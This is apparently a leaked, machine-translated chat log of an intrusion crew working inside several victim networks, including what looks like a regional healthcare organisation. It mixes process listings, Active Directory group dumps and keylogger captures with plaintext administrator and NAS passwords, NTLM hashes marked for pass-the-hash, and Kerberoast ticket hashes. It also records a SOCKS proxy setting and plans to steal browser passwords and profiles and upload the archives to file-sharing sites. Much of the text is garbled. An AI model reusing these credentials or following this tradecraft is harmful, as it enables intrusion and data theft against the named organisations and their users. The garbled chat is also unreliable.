WATERWAY\mapusatera 0:00:44 svchost.exe 5672 RDP-Tcp#2 2 25,728 K WATERWAY\mapusatera 0:00:01 svchost.exe 12848 Services 0 20,636 K NT AUTHORITY\SYSTEM 0:00:01 taskhostw.exe 6836 RDP-Tcp#2 2 21,608 K WATERWAY\mapusatera 0:00:03 svchost.exe 8544 Services 0 7,808 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 11900 Services 0 18,716 K NT AUTHORITY\LOCAL SERVICE 0:00:00 ctfmon.exe 1768 RDP-Tcp#2 2 28,616 K WATERWAY\mapusatera 0:00:42 explorer.exe 13472 RDP-Tcp#2 2 175,424 K WATERWAY\mapusatera 0:01:37 NVIDIA Web Helper.exe 13484 RDP-Tcp#2 2 12,100 K WATERWAY\mapusatera 0:00:02 conhost.exe 13556 RDP-Tcp#2 2 2 1,268 K WATERWAY\mapusatera 0:00:00 svchost.exe 13708 RDP-Tcp#2 2 23,276 K WATERWAY\mapusatera 0:00:01 GoogleCrashHandler.exe 13812 Services 0 1,256 K NT AUTHORITY\SYSTEM 0:00:00 GoogleCrashHandler64.exe 13900 Services 0 1,296 K NT AUTHORITY\SYSTEM 0:00:00 StartMenuExperienceHost.e 13456 RDP-Tcp#2 2 60,176 K WATERWAY\mapusatera 0:00:01 RuntimeBroker.exe 13824 RDP-Tcp#2 2 24,052 K WATERWAY\mapusatera 0:00:00 SearchApp.exe 14232 RDP-Tcp#2 2 2 89,900 K WATERWAY\mapusatera 0:00:10 RuntimeBroker.exe 14348 RDP-Tcp#2 2 36,724 K WATERWAY\mapusatera 0:00:02 YourPhone.exe 14588 RDP-Tcp#2 2 6,244 K WATERWAY\mapusatera 0:00:00 svchost.exe 15044 Services 0 11,672 K NT AUTHORITY\SYSTEM 0:00:00 RuntimeBroker.exe 5240 RDP-Tcp#2 2 14,200 K WATERWAY\mapusatera 0:00:00 nvsphelper64.exe 15008 RDP-Tcp#2 2 11,572 K WATERWAY\mapusatera 0:00:00 NVIDIA Share.exe 15216 RDP-Tcp#2 2 44,948 K WATERWAY\mapusatera 0:00:05 NVIDIA Share.exe 15424 RDP-Tcp#2 2 29,452 K WATERWAY\mapusatera 0:00:00 NVIDIA Share.exe 15540 RDP-Tcp#2 2 2 50,808 K WATERWAY\mapusatera 0:00:01 SecurityHealthSystray.exe 16052 RDP-Tcp#2 2 9,176 K WATERWAY\mapusatera 0:00:00 SecurityHealthService.exe 16076 Services 0 12,740 K NT AUTHORITY\SYSTEM 0:00:00 NCentralRRDLdr.exe 16204 RDP-Tcp#2 2 11,012 K WATERWAY\mapusatera 0:00:00 RuntimeBroker.exe 16216 RDP-Tcp#2 2 23,284 K WATERWAY\mapusatera 0:00:03 NCentralRDViewer.exe 16256 
RDP-Tcp#2 2 41,920 K WATERWAY\mapusatera 0:00:03 SgrmBroker.exe 14216 Services 0 8,856 K NT AUTHORITY\SYSTEM 0:00:02 SolarWinds.MSP.PME.Agent. 2288 Services 0 22,804 K NT AUTHORITY\SYSTEM 0:00:00 AgentMaint.exe 16328 Services 0 25,676 K NT AUTHORITY\SYSTEM 0:00:01 svchost.exe 15380 Services 0 9,992 K NT AUTHORITY\LOCAL SERVICE 0:00:00 svchost.exe 15616 RDP-Tcp#2 2 11,328 K WATERWAY\mapusatera 0:00:00 outlook.exe 15980 RDP-Tcp#2 2,340,144 K WATERWAY\mapusatera 0:05:42 chrome.exe 4656 RDP-Tcp#2 2,305,636 K WATERWAY\mapusatera 0:07:59 chrome.exe 13684 RDP-Tcp#2 2 6,852 K WATERWAY\mapusatera 0:00:00 chrome.exe 7272 RDP-Tcp#2 2 192,908 K WATERWAY\mapusatera 0:03:08 chrome.exe 15872 RDP-Tcp#2 2 73,628 K WATERWAY\mapusatera 0:01:53 chrome.exe 15140 RDP-Tcp#2 2 17,468 K WATERWAY\mapusatera 0:00:09 chrome.exe 13936 RDP-Tcp#2 2 67,464 K WATERWAY\mapusatera 0:00:15 chrome.exe 16380 RDP-Tcp#2 2 71,084 K WATERWAY\mapusatera 0:00:01 chrome.exe 15876 RDP-Tcp#2 2 132,800 K WATERWAY\mapusatera 0:00:55 chrome.exe 15948 RDP-Tcp#2 2 84,912 K WATERWAY\mapusatera 0:00:57 chrome.exe 15596 RDP-Tcp#2 2 2 71,180 K WATERWAY\mapusatera 0:00:11 TextInputHost.exe 16836 RDP-Tcp#2 2 43,968 K WATERWAY\mapusatera 0:00:03 chrome.exe 17156 RDP-Tcp#2 2 27,296 K WATERWAY\mapusatera 0:00:01 svchost.exe 17356 Services 0 9,956 K NT AUTHORITY\SYSTEM 0:00:00 chrome.exe 17412 RDP-Tcp#2 2 2 56,608 K WATERWAY\mapusatera 0:00:13 chrome.exe 1800 RDP-Tcp#2 2 2 87,588 K WATERWAY\mapusatera 0:00:20 chrome.exe 18900 RDP-Tcp#2 2 2,172,060 K WATERWAY\mapusatera 0:00:21 chrome.exe 2452 RDP-Tcp#2 2 49,728 K WATERWAY\mapusatera 0:00:20 chrome.exe 16772 RDP-Tcp#2 2 206,988 K WATERWAY\mapusatera 0:02:34 chrome.exe 16792 RDP-Tcp#2 2,205,424 K WATERWAY\mapusatera 0:01:59 chrome.exe 16808 RDP-Tcp#2 2 177,120 K WATERWAY\mapusatera 0:01:14 chrome.exe 19496 RDP-Tcp#2 2 2 88,640 K WATERWAY\mapusatera 0:00:03 chrome.exe 16876 RDP-Tcp#2 2 2 82,568 K WATERWAY\mapusatera 0:00:20 chrome.exe 16396 RDP-Tcp#2 2 2 17,668 K 
WATERWAY\mapusatera 0:00:00 chrome.exe 6036 RDP-Tcp#2 2 2 45,264 K WATERWAY\mapusatera 0:00:01 NableAVDBridge.exe 17592 Services 0 31,432 K NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 20648 Services 0 5,540 K NT AUTHORITY\SYSTEM 0:00:00 AdobeNotificationClient.e 21140 RDP-Tcp#2 2 3,848 K WATERWAY\mapusatera 0:00:00 RuntimeBroker.exe 10348 RDP-Tcp#2 2 12,900 K WATERWAY\mapusatera 0:00:00 svchost.exe 23088 Services 0 6,772 K NT AUTHORITY\SYSTEM 0:00:00 VSSVC.exe 24408 Services 0 10,372 K NT AUTHORITY\SYSTEM 0:00:16 svchost.exe 22936 Services 0 8,864 K NT AUTHORITY\SYSTEM 0:00:18 UserOOBEBroker.exe 12744 RDP-Tcp#2 2 9,628 K WATERWAY\mapusatera 0:00:00 svchost.exe 20932 Services 0 21,140 K NT AUTHORITY\SYSTEM 0:00:00 chrome.exe 21864 RDP-Tcp#2 2 225,636 K WATERWAY\mapusatera 0:00:29 chrome.exe 13324 RDP-Tcp#2 2,105,720 K WATERWAY\mapusatera 0:00:43 dllhost.exe 2232 RDP-Tcp#2 2 2 12,444 K WATERWAY\mapusatera 0:00:00 ApplicationFrameHost.exe 7964 RDP-Tcp#2 2 24,924 K WATERWAY\mapusatera 0:00:00 taskhostw.exe 25584 RDP-Tcp#2 2 18,996 K WATERWAY\mapusatera 0:00:00 iexplore.exe 25380 RDP-Tcp#2 2 2 31,936 K WATERWAY\mapusatera 0:00:00 iexplore.exe 8428 RDP-Tcp#2 2 2 15,788 K WATERWAY\mapusatera 0:00:01 chrome.exe 25160 RDP-Tcp#2 2 46,956 K WATERWAY\mapusatera 0:00:01 svchost.exe 20296 Services 0 6,696 K NT AUTHORITY\SYSTEM 0:00:00 chrome.exe 12184 RDP-Tcp#2 2 176,704 K WATERWAY\mapusatera 0:01:30 chrome.exe 6468 RDP-Tcp#2 2,104,252 K WATERWAY\mapusatera 0:00:04 chrome.exe 21264 RDP-Tcp#2 2 52,912 K WATERWAY\mapusatera 0:00:00 chrome.exe 14704 RDP-Tcp#2 2 2 64,868 K WATERWAY\mapusatera 0:00:01 chrome.exe 18672 RDP-Tcp#2 2 64,892 K WATERWAY\mapusatera 0:00:02 chrome.exe 21156 RDP-Tcp#2 2 50,592 K WATERWAY\mapusatera 0:00:00 chrome.exe 24160 RDP-Tcp#2 2 96,412 K WATERWAY\mapusatera 0:00:03 chrome.exe 22756 RDP-Tcp#2 2 50,880 K WATERWAY\mapusatera 0:00:00 chrome.exe 8320 RDP-Tcp#2 2 2 88,032 K WATERWAY\mapusatera 0:00:02 chrome.exe 23780 RDP-Tcp#2 2 2 51,092 K WATERWAY\mapusatera 
0:00:00 svchost.exe 18788 Services 0 15,468 K NT AUTHORITY\LOCAL SERVICE 0:00:00 SettingSyncHost.exe 25812 RDP-Tcp#2 2 6,176 K WATERWAY\mapusatera 0:00:00 svchost.exe 10760 Services 0 11,264 K NT AUTHORITY\SYSTEM 0:00:00 WmiPrvSE.exe 21536 Services 0 10,624 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 12976 Services 0 20,216 K NT AUTHORITY\SYSTEM 0:00:00 devenv.exe 21676 RDP-Tcp#2 2,505,908 K WATERWAY\mapusatera 0:00:40 PerfWatson2.exe 1648 RDP-Tcp#2 2 70,476 K WATERWAY\mapusatera 0:00:02 Microsoft.ServiceHub.Cont 3392 RDP-Tcp#2 2 57,436 K WATERWAY\mapusatera 0:00:01 conhost.exe 5328 RDP-Tcp#2 2 10,772 K WATERWAY\mapusatera 0:00:00 ServiceHub.VSDetouredHost 6328 RDP-Tcp#2 2 80,500 K WATERWAY\mapusatera 0:00:03 ServiceHub.IdentityHost.e 22516 RDP-Tcp#2 2 99,428 K WATERWAY\mapusatera 0:00:05 conhost.exe 23400 RDP-Tcp#2 2 2 10,752 K WATERWAY\mapusatera 0:00:00 conhost.exe 22260 RDP-Tcp#2 2 10,744 K WATERWAY\mapusatera 0:00:00 ServiceHub.SettingsHost.e 3612 RDP-Tcp#2 2 111,168 K WATERWAY\mapusatera 0:00:03 conhost.exe 23096 RDP-Tcp#2 2 2 10,772 K WATERWAY\mapusatera 0:00:00 ServiceHub.Host.CLR.x86.e 3112 RDP-Tcp#2 2 62,536 K WATERWAY\mapusatera 0:00:01 conhost.exe 2992 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00 ServiceHub.RoslynCodeAnal 19432 RDP-Tcp#2 2 295,244 K WATERWAY\mapusatera 0:00:11 conhost.exe 19164 RDP-Tcp#2 2 10,752 K WATERWAY\mapusatera 0:00:00 ServiceHub.ThreadedWaitDi 18648 RDP-Tcp#2 2 71,792 K WATERWAY\mapusatera 0:00:02 conhost.exe 8992 RDP-Tcp#2 2 10,764 K WATERWAY\mapusatera 0:00:00 sqlservr.exe 2800 RDP-Tcp#2 2,381,244 K WATERWAY\mapusatera 0:00:10 ServiceHub.Host.CLR.x86.e 24636 RDP-Tcp#2 2 83,308 K WATERWAY\mapusatera 0:00:03 conhost.exe 24708 RDP-Tcp#2 2 2 10,760 K WATERWAY\mapusatera 0:00:00 ServiceHub.TestWindowStor 15700 RDP-Tcp#2 2 2 63,176 K WATERWAY\mapusatera 0:00:01 conhost.exe 10360 RDP-Tcp#2 2 2 10,776 K WATERWAY\mapusatera 0:00:00 ServiceHub.Host.CLR.x86.e 20912 RDP-Tcp#2 2 63,996 K WATERWAY\mapusatera 0:00:01 conhost.exe 4388 
RDP-Tcp#2 2 2 10,752 K WATERWAY\mapusatera 0:00:00 chrome.exe 22888 RDP-Tcp#2 2 120,740 K WATERWAY\mapusatera 0:00:12 chrome.exe 23436 RDP-Tcp#2 2,123,468 K WATERWAY\mapusatera 0:00:08 chrome.exe 23980 RDP-Tcp#2 2,101,556 K WATERWAY\mapusatera 0:00:03 chrome.exe 24536 RDP-Tcp#2 2 2 95,496 K WATERWAY\mapusatera 0:00:02 chrome.exe 18072 RDP-Tcp#2 2 2,424 K WATERWAY\mapusatera 0:00:04 devenv.exe 17440 RDP-Tcp#2 2 548,328 K WATERWAY\mapusatera 0:01:08 PerfWatson2.exe 19876 RDP-Tcp#2 2 66,292 K WATERWAY\mapusatera 0:00:01 Microsoft.ServiceHub.Cont 3400 RDP-Tcp#2 2 2 55,544 K WATERWAY\mapusatera 0:00:01 conhost.exe 3436 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00 ServiceHub.VSDetouredHost 24196 RDP-Tcp#2 2 80,520 K WATERWAY\mapusatera 0:00:03 ServiceHub.IdentityHost.e 17652 RDP-Tcp#2 2 96,368 K WATERWAY\mapusatera 0:00:05 conhost.exe 19700 RDP-Tcp#2 2 2 10,760 K WATERWAY\mapusatera 0:00:00 conhost.exe 13384 RDP-Tcp#2 2 10,740 K WATERWAY\mapusatera 0:00:00 ServiceHub.RoslynCodeAnal 14756 RDP-Tcp#2 2 271,108 K WATERWAY\mapusatera 0:00:07 conhost.exe 9688 RDP-Tcp#2 2 10,760 K WATERWAY\mapusatera 0:00:00 ServiceHub.ThreadedWaitDi 20588 RDP-Tcp#2 2 71,472 K WATERWAY\mapusatera 0:00:01 conhost.exe 8224 RDP-Tcp#2 2 2 10,748 K WATERWAY\mapusatera 0:00:00 ServiceHub.Host.CLR.x86.e 22956 RDP-Tcp#2 2 2 61,828 K WATERWAY\mapusatera 0:00:01 conhost.exe 13400 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00 ServiceHub.SettingsHost.e 23348 RDP-Tcp#2 2 113,756 K WATERWAY\mapusatera 0:00:07 conhost.exe 25440 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00 ServiceHub.Host.CLR.x86.e 18560 RDP-Tcp#2 2 57,704 K WATERWAY\mapusatera 0:00:01 conhost.exe 11608 RDP-Tcp#2 2 2 10,732 K WATERWAY\mapusatera 0:00:00 svchost.exe 26356 Services 0 7,628 K NT AUTHORITY\SYSTEM 0:00:00 ScriptedSandbox64.exe 4112 RDP-Tcp#2 2 43,492 K WATERWAY\mapusatera 0:00:00 WmiPrvSE.exe 23456 Services 0 15,020 K NT AUTHORITY\NETWORK SERVICE 0:00:04 chrome.exe 21960 RDP-Tcp#2 2 23,100 K WATERWAY\mapusatera 
0:00:00 ``Give me a list of processes192.168.0.164 I'd like to see his car,`` for now,`` I don't have a car in coba,`` have you looked exactly,`` I think the post office has looked at something else or his mail,``

```
>memberOf: CN=Veeam Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Senior Ops,OU=WWW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=IT,OU=WW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Hyper-V Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=ITStaff,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Office,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OfficeSQL,OU=SQLGroups,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OnlyOffice,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Schema Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Enterprise Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Domain Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
```

Do you have it? mapusateraatam also not saved even on the rd went to someone I do not remember someone exactly had and the rest do not mention nimbla in the stories? even somharper or with blauer? with gkellera who do you work with?
PID PPID Name Arch Session User --- ---- ---- ---- ------- ---- 0 0 [System Process] 4 0 System x64 0 NT AUTHORITY\SYSTEM 324 4 smss.exe x64 0 NT AUTHORITY\SYSTEM 488 480 csrss.exe x64 0 NT AUTHORITY\SYSTEM 556,544 csrss.exe x64 1 NT AUTHORITY\SYSTEM 564 480 wininit.exe x64 0 NT AUTHORITY\SYSTEM 652 564 services.exe x64 0 NT AUTHORITY\SYSTEM 292 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM 10452 292 taskhostex.exe x64 2 WATERWAY\Administrator 11364 292 taskhostex.exe x64 3 WATERWAY\gkeller 356 652 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 500 652 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 784 652 ntfrs.exe x64 0 NT AUTHORITY\SYSTEM 820 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM 9264 820 WmiPrvSE.exe x64 0 NT AUTHORITY/UNETWORK SERVICE 12292 820 RuntimeBroker.exe x64 2 WATERWAY\Administrator 864 652 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 992 652 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1124 652 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1248 652 ismserv.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1520 652 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM 1548 652 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM 1600 652 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM 1632 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 1648 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1668 652 dns.exe x64 0 NT AUTHORITY\SYSTEM 1688 652 EPIntegrationService.exe x64 0 NT AUTHORITY\SYSTEM 1820 652 EPProtectedService.exe x64 0 NT AUTHORITY\SYSTEM 1900 652 bdredline.exe x64 0 NT AUTHORITY\SYSTEM 1956 652 EPSecurityService.exe x64 0 NT AUTHORITY\SYSTEM 10412 1956 EPConsole.exe x64 2 WATERWAY\Administrator 11292 1956 EPConsole.exe x64 3 WATERWAY\gkeller 2012 652 EPUpdateService.exe x64 0 NT AUTHORITY\SYSTEM 2020 652 pg_ctl.exe x86 0 NT AUTHORITY\SYSTEM 2300 2020 postgres.exe x86 0 NT AUTHORITY\SYSTEM 2324 2300 conhost.exe x64 0 NT AUTHORITY\SYSTEM 2368 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 2452 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 2560 2300 postgres.exe x86 0 NT 
AUTHORITY\SYSTEM 2580 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 7248 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 7260 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 72882 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 7324 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 8348 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 8372 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 8392 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 8412 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 8432 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 8452 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 8472 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 8492 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 8512 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 8532 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 8616 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 9952 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 10760 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 11244 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 11656 2300 postgres.exe x86 0 NT AUTHORITY\SYSTEM 2292 652 wbserver.exe x86 0 NT AUTHORITY\SYSTEM 2424 652 wlcollector.exe x86 0 NT AUTHORITY\SYSTEM 2444 652 apache.exe x86 0 NT AUTHORITY\SYSTEM 2196 2444 Apache.exe x86 0 NT AUTHORITY\SYSTEM 2516 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM 2680 2516 Apache.exe x86 0 NT AUTHORITY\SYSTEM 2544 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM 2244 2544 Apache.exe x86 0 NT AUTHORITY\SYSTEM 2592 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM 1588 2592 Apache.exe x86 0 NT AUTHORITY\SYSTEM 2632 652 Apache.exe x86 0 NT AUTHORITY\SYSTEM 2604 2632 Apache.exe x86 0 NT AUTHORITY\SYSTEM 2668 652 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM 9540 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 10584 9540 rdpclip.exe x64 2 WATERWAY\Administrator 11336 9540 rdpclip.exe x64 3 WATERWAY\gkeller 9648 652 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE 9696 652 vds.exe x64 0 NT AUTHORITY\SYSTEM 9768 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM 9804 652 svchost.exe x64 0 NT AUTHORITY\SYSTEM 9832 652 svchost.exe x64 0 NT 
AUTHORITY\SYSTEM 9920 652 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 10020 652 VSSVC.exe x64 0 NT AUTHORITY\SYSTEM 660 564 lsass.exe x64 0 NT AUTHORITY\SYSTEM 592 544 winlogon.exe x64 1 NT AUTHORITY\SYSTEM 948 592 logonUI.exe x64 1 NT AUTHORITY\SYSTEM 1000 592 dwm.exe x64 1 Window Manager\DWM-1 1464 1468 csrss.exe x64 2 NT AUTHORITY\SYSTEM 1760 2972 csrss.exe x64 3 NT AUTHORITY\SYSTEM 2756 2972 winlogon.exe x64 3 NT AUTHORITY\SYSTEM 2788 2756 dwm.exe x64 3 Window Manager\DWM-3 9308 1468 winlogon.exe x64 2 NT AUTHORITY\SYSTEM 10276 9308 dwm.exe x64 2 Window Manager\DWM-2 9708 10044 mstsc.exe x86 0 NT AUTHORITY\SYSTEM 10652 10616 explorer.exe x64 2 WATERWAY\Administrator 10968 10652 wsc.exe x86 2 WATERWAY\Administrator 11200 10652 CCleaner64.exe x64 2 WATERWAY\Administrator 12136 10652 chrome.exe x64 2 WATERWAY\Administrator 2932 12136 chrome.exe x64 2 WATERWAY\Administrator 9428 12136 chrome.exe x64 2 WATERWAY\Administrator 11268 12136 chrome.exe x64 2 WATERWAY\Administrator 11440 12136 chrome.exe x64 2 WATERWAY\Administrator 11468 12136 chrome.exe x64 2 WATERWAY\Administrator 12092 12136 chrome.exe x64 2 WATERWAY\Administrator 11620 11560 explorer.exe x64 3 WATERWAY\gkeller 9384 11620 wsc.exe x86 3 WATERWAY\gkeller 12000 11388 ServerManager.exe x64 3 WATERWAY\gkeller 12224 12000 mmc.exe x64 3 WATERWAY\gkeller If request for credits from the browser and 7za.exe spam such processes, then maybe it's our doing? 
5244 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM 5260 5252 explorer.exe x64 2 WATERWAY\Administrator 5800 608 mstsc.exe x86 1 NT AUTHORITY\SYSTEM 5848 10672 conhost.exe x64 1 NT AUTHORITY\SYSTEM 5936 6076 conhost.exe x64 1 NT AUTHORITY\SYSTEM 6076 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM 6108 10488 conhost.exe x64 1 NT AUTHORITY\SYSTEM 7480 10060 conhost.exe x64 1 NT AUTHORITY\SYSTEM 7720 6076 tasklist.exe x64 1 NT AUTHORITY\SYSTEM 8988 10488 tasklist.exe x64 1 NT AUTHORITY\SYSTEM 9108 5244 tasklist.exe x64 1 NT AUTHORITY\SYSTEM 9620 5244 conhost.exe x64 1 NT AUTHORITY\SYSTEM 10060 5800 cmd.exe x86 1 NT AUTHORITY\SYSTEM 10488 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM 10672 5800 cmd.exe x86 1 NT AUTHORITY\SYSTEM 11156 11164 conhost.exe x64 1 NT AUTHORITY\SYSTEM 11164 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM 11228 11164 tasklist.exe x64 1 NT AUTHORITY\SYSTEM he last time he visited this urral was on october 20th i don't think they're that worried that only one person+no, also clean forms, i'll try to see if he has a lustpass in chrome and no password? blauer also or did you only take chrome off any other person in the history no nimbla? by the way about other italian people in this network only problem with nimbla i still have 2 crits with access there 192.168.0.3 Waterway 11915Wnas2179! ``That's what you found,`` isn't it? http://192.168.0.3:5000/ WW99NAS - Synology DiskStation ``From the premium pornhub I wish I'd gotten it in some kind of grid and the credits from steem, league of legends and meinkraft. 388 https:// www.dragonawaken.com 40 389 http:// www.9minecraft.net 100 ``There's a different process to put? + he has 4 monitors there or what)`` clearly writes skul query and here lke = like`re ea lke c'[F5]`` it seems to me that he has a different layout or koba trojit? 
SQLQuery4.sql - wwng-prod.database.windows.net.WWNG (wwng-admin (82))* - Microsoft SQL Server Management Studio ======= re ea lke c'[F5] SQLQuery3.sql - wwng-prod.database.windows.net.WWNG (wwng-admin (80))* - Microsoft SQL Server Management Studio ======= hee si[tab][control] Waterway IT - Agent - Mozilla Firefox ======= , h,.isom frmv. Plseley e no .cel i [backspace]oul bsbe[backspace][backspace][backspace][backspace][backspace][backspace]s odpo e ``Turn off the juice of one of them, let it browse further while it's on the monitor``` Waterway IT - Agent - Mozilla Firefox ======= Ry, ee et ac tntkwif re shi el eed ``He's writing something in Tuvan there, I've only put the logbook there to help)[ ](https://mediaeveryone.com/group/waterway-com?msg=CReq7aL7Fw5fhS8Su) .))[ ](https://mediaeveryone.com/group/waterway-com?msg=av7QT8QTmaZMn6nwC) .no, the nimble address of the car itself? setg Proxies socks4:209.222.97.8:5543 ``and ip adr to log in sock from his tachka+password is the same? https://www.sendspace.com/file/dudf68не fully uploaded the archive that by the way was normal?yes i would be glad to fill me a normal archive) in the browser cleanly not to watch the control panel dkmen and watched vidosikon came at the most inopportune moment if that herehttp://www.howtogeek.com/679085/how-to-view-a-saved-password-in-firefox/ԁавы by rdp went? can not open the file as archive`tghiWERm4234A` https://qaz.im/load/f3hhRs/zB3ahSсюда uploadqaz.im and encrypt the file names under the password here you will endlessly upload to a third-party resource increase the size of the files + upload me a profile and by rd there check idletime did not worka ok only make a backup of your own make it necessary to delete your files and upload them in the current profile of the browser, then rdnu I get into the profiles folder downloaded profile no profile come? 
there is a folder let's take the folder away then we can also take the folder away yes ====== IdleTime ====== CurrentUser : WATERWAY\mharper Idletime : 07h:54m:42s:515ms (28482515 milliseconds) ``check his idletime and on rdp)`` why? I downloaded the folder with the profile ffrebut just rebooted? computer off? it looks like the computer rebooted from the network did not throw out? ping servers and all ready did not find the total for hell 1726 160 servers 1550 armies 16 eksha,nasa,linpoka nothing,1 subnet only scanned vg have what? + on the backup server hangs the cloud service process, but on rdp under another user does not see any settings that backups go to the cloud - all other settings backups are visible. Maybe it's just service hanging, but they're not using it. As they are gone, you can check on the rdp ``` Veeam.Backup.CloudService 4676 Services 0 209,772 K VEEAM01\Administrator 0:03:16 ``Backups - vm and filestores ``` 10.1.20.183 VEEAM01.main.crispregional.org E: G: 192.168.9.124 ts1400backup.main.crispregional.org NAS admin\cr1spy173 format disk 10.1.0.22 CRHSBACKUP.main.crispregional.org D:DATAPART1 10.10.1.43 itunitynas.main.crispispregional.org NAS Bookmark \backup, access by YES ``macaffi server ``` https://it-admin:8443/core/ works by rdp (10.1.20.113) Administrator cr1spy173 ``great) in the center ``` https://crhsvcenter7.main.crispregional.org/ui/ Administrator@main.crispregional.org cr1spy173 ``Domain Admins ``` th MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24 cr1spy173 pth MAIN\Allscripts_Admin 19a1901a003621a6e1abd6edb0e7cf0b pth MAIN\allscripts_services 19512cc1b7dc97e7e302f34a2245cabe pth MAIN\AllscriptsSQL 6a8e1d103a88ea3dc2a012d34e544e99 pth MAIN\blove 7bef985313e414bb847c4dcd6c7c6826 pth MAIN\htservice 0cf803b54e919bc11e75c48ea596eb92 pth MAIN\meditech-admin d28f5c2d3ea915737812fbdeb4ea4c79 pth MAIN\meditech d28f5c2d3ea915737812fbdeb4ea4c79 pth MAIN\nodom 9255c608109b78b60fc048e84b7926aa pth MAIN\rthomas 
6f0b655dac0046d92eb3fec69ba6aece pth MAIN\tcoppedge 06a1064c70fa0e250e81eddc4f046dacc pth MAIN\amhs-admin 443abd60ece7cfb885a54fd2ba35ffcb pth MAIN\dragon 6a8e1d103a88ea3dc2a012d34e544e99 pth MAIN/jwashburn1 fc98da86ebcc76100a0e62c22d0bd2ca pth MAIN\pbodrey 300249ae0b204470a430295a2dc30a07 pth MAIN\smaxwell 87a628063ebb1e790221800f8ed76d16 pth MAIN\ashleys 4f3d00492c0d5219ba173c26fc1694ef pth MAIN\MBAM-RW-SVC 04a88994cf7db5a0e8730e4effd73742 pth MAIN\mhiers 3b3000484afdc685a779399548e76d9e pth MAIN\rlagrone 438eb0f2356b0f16719a307919e583c6 pth MAIN\spf_svcs e25c3e50d7638936c2f2ee77eebb1f24 pth MAIN\helpdesk 0219040d969969400d4253ff874683fd9f8 ``C:\projects\default\temp BBCTX6 @ MAPCIASP\bbbwalkerj @sleep don't forget to kill the sessionKerb removal, sent T2snap don't forget to clean files@help @sleep all native commands go through @link to the module for the nativ and the desired yusejHow to write? Describe how it should work? I will create a request to add in the personal where to write? and do not load modules from the guitar write more simply that I would like to add as nativman on tpsh is unlikely to be at the topLeft I have no white background) blackZmek there you will see a boxPAYLOAD Writes at the top left in white on a white backgrounda bug interface it is Need a man on this TPS and the ability to create the load in tpsh threw the session immediately progress went what the day did` `` TicketByteHexStream : Hash : $krb5tgs$23$*Administrator$mapciasp.com$MSSQLSvc/ASPSIM1 .mapciasp.com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amAccountName : Administrator DistinguishedName : CN=Administrator,CN=Users,DC=mapciasp,DC=com ServicePrincipalName : MSSQLSvc/ASPSIM1.mapciasp.com TicketByteHexStream : Hash : $krb5tgs$23$*sccmservice$mapciasp.com$MSSQLSvc/ASPSQL02. 
